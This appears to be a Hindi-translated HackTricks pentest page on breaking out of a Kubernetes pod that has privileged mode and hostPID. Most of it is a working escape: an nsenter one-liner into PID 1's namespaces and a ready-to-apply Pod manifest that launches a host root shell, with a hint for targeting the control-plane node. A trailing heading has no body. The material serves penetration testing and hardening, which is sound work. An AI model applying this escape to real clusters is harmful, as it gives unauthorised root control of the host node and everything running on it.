Pod Escape Privileges

हैकट्रिक्स का समर्थन करें और लाभ प्राप्त करें!

विशेषाधिकार और hostPID

इन विशेषाधिकारों के साथ आपको होस्ट प्रक्रियाओं तक पहुंच होगी और एक होस्ट प्रक्रिया के नेमस्पेस में प्रवेश करने के लिए पर्याप्त विशेषाधिकार होंगे। ध्यान दें कि आपको संभवतः विशेषाधिकार की आवश्यकता नहीं हो सकती है, बल्कि केवल कुछ क्षमताओं और अन्य संभावित सुरक्षा बाइपास (जैसे apparmor और/या seccomp) की आवश्यकता हो सकती है।

बस निम्नलिखित की तरह कुछ ऐसा करने से आप पॉड से बाहर निकल सकते हैं:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

विन्यास उदाहरण:

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

केवल विशेषाधिकारी

हैकट्रिक्स का समर्थन करें और लाभ प्राप्त करें!

Last updated